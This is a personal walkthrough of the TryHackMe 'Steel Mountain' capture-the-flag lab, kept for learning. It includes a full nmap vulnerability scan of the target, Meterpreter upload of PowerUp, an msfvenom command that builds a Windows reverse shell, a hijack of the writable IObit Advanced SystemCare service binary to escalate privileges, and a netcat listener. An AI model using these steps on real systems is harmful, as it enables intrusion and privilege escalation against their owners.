TryHackMe: Complete Beginner

Steel Mountain


Apparently this machine is running a web server. (Though I never would have guest that without first searching for a walkthrough of this TryHackMe room, as my initial response was, “how the hell do I know who the employee of the month is based on the IP of a Windows machine I can’t yet log into?”)

The machine IP address for this exercise is

Initial Access

NMAP command line (note that we skip the ping test, since Windows machines don’t respond to ping by default, and because the introduction told us that this machine wouldn’t respond to ping):

sudo nmap -v -oA steel-mountain -A -Pn -sS \
          --script vuln -p-


# Nmap 7.92 scan initiated Sun Nov  7 16:44:22 2021 as: nmap -v -T4 -oA steel-mountain -A -Pn -sS --script vuln -p-
Nmap scan report for
Host is up (0.17s latency).
Not shown: 65520 closed tcp ports (reset)
80/tcp    open  http               Microsoft IIS httpd 8.5
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-IIS/8.5
|_http-csrf: Couldn't find any CSRF vulnerabilities.
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ssl/ms-wbt-server?
| ssl-dh-params: 
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
|             Modulus Type: Safe prime
|             Modulus Source: RFC2409/Oakley Group 2
|             Modulus Length: 1024
|             Generator Length: 1024
|             Public Key Length: 1024
|     References:
5985/tcp  open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-server-header: Microsoft-HTTPAPI/2.0
8080/tcp  open  http               HttpFileServer httpd 2.3
| vulners: 
|   cpe:/a:rejetto:httpfileserver:2.3: 
|     	1337DAY-ID-35849	10.0	*EXPLOIT*
|     	SECURITYVULNS:VULN:14023	7.5
|     	PACKETSTORM:161503	7.5	*EXPLOIT*
|     	PACKETSTORM:160264	7.5	*EXPLOIT*
|     	PACKETSTORM:135122	7.5	*EXPLOIT*
|     	PACKETSTORM:128593	7.5	*EXPLOIT*
|     	PACKETSTORM:128243	7.5	*EXPLOIT*
|     	EXPLOITPACK:A39709063C426496F984E8852560BBFF	7.5	*EXPLOIT*
|     	EDB-ID:49584	7.5	*EXPLOIT*
|     	EDB-ID:49125	7.5	*EXPLOIT*
|     	EDB-ID:39161	7.5	*EXPLOIT*
|     	EDB-ID:34926	7.5	*EXPLOIT*
|     	EDB-ID:34668	7.5	*EXPLOIT*
|     	1337DAY-ID-25379	7.5	*EXPLOIT*
|     	1337DAY-ID-22733	7.5	*EXPLOIT*
|     	1337DAY-ID-22640	7.5	*EXPLOIT*
|_    	1337DAY-ID-6287	0.0	*EXPLOIT*
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-method-tamper: 
|   Authentication bypass by HTTP verb tampering
|     State: VULNERABLE (Exploitable)
|       This web server contains password protected resources vulnerable to authentication bypass
|       vulnerabilities via HTTP verb tampering. This is often found in web servers that only limit access to the
|        common HTTP methods and in misconfigured .htaccess files.
|     Extra information:
|   URIs suspected to be vulnerable to HTTP verb tampering:
|     /~login [GENERIC]
|     References:
| http-fileupload-exploiter: 
|_    Couldn't find a file-type field.
| http-vuln-cve2011-3192: 
|   Apache byterange filter DoS
|     State: VULNERABLE
|     IDs:  BID:49303  CVE:CVE-2011-3192
|       The Apache web server is vulnerable to a denial of service attack when numerous
|       overlapping byte ranges are requested.
|     Disclosure date: 2011-08-19
|     References:
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: HFS 2.3
47001/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49156/tcp open  msrpc              Microsoft Windows RPC
49163/tcp open  msrpc              Microsoft Windows RPC
49164/tcp open  msrpc              Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see ).
TCP/IP fingerprint:

Uptime guess: 0.119 days (since Sun Nov  7 14:17:42 2021)
Network Distance: 4 hops
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_smb-vuln-ms10-061: No accounts left to try
|_smb-vuln-ms10-054: false
|_samba-vuln-cve-2012-1182: No accounts left to try

TRACEROUTE (using port 1723/tcp)
1   33.91 ms
2   ... 3
4   174.12 ms

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at .
# Nmap done at Sun Nov  7 17:08:26 2021 -- 1 IP address (1 host up) scanned in 1444.56 seconds

The Windows counterpart to cat is type.


I lost a good hour getting stuck because of these two minor complications.

Privilege Escalation

PowerUp is a script that scans for common Windows vulnerabilities. It looks like the version that’s included with Kali Linux is different and/or not-up-to-date relative to the version of PowerUp linked to by the TryHackMe Steelmountain room. In particular, Kali version doesn’t list a lot of information about potentially vulnerable services that is necessary for completing this section. (On the downside, the version of PowerUp we need to use produces a lot of duplicative output too…)

Anyways, first we have to download the more capable version of PowerUp:

curl -O

Meterpreter can upload files to the target machine:

upload /home/kali/PowerUp.ps1

To load it up in Meterpreter we need to shell out to PowerShell.

load powershell

And then:

. .\PowerUp.ps1

For whatever reason, the room lists the wrong msfvenom command. To generate the correct reverse shell requires:

msfvenom -p windows/shell_reverse_tcp \
            LHOST= LPORT=4443 \
         -e x86/shikata_ga_nai -f exe -o ASCService.exe

(The reason we need to specify an encoder here is because the vulnerable binary is in Program Files (x86), so we need to produce an x86 binary rather than the default x86_64 binary.)

To upload this, we’ll need to background PowerShell with ^Z. (Don’t try to exit - for me this caused hangs, and I eventually had to restart the machine!) Upload and then start a new shell:

upload /home/kali/ASCService.exe

Replace the ASCService.exe binary (its permissions are such that we can do this) and restart the service:

Stop-Service -Name AdvancedSystemCareService9
cp "C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"
cp -force ASCService.exe
   "C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"
Start-Service -Name AdvancedSystemCareService9

(We can run Stop-Service and Start-Service because the user we’ve compromised has the CanRestart permission for this service.)

Catch this reverse shell using netcat:

nc -lvnp 4443

Once we have the root flag, let’s put the service back the way it was before we try the non-Metasploit version of this.

Stop-Service -Name AdvancedSystemCareService9
cp -force ASCService.exe.bak
   "C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"
Start-Service -Name AdvancedSystemCareService9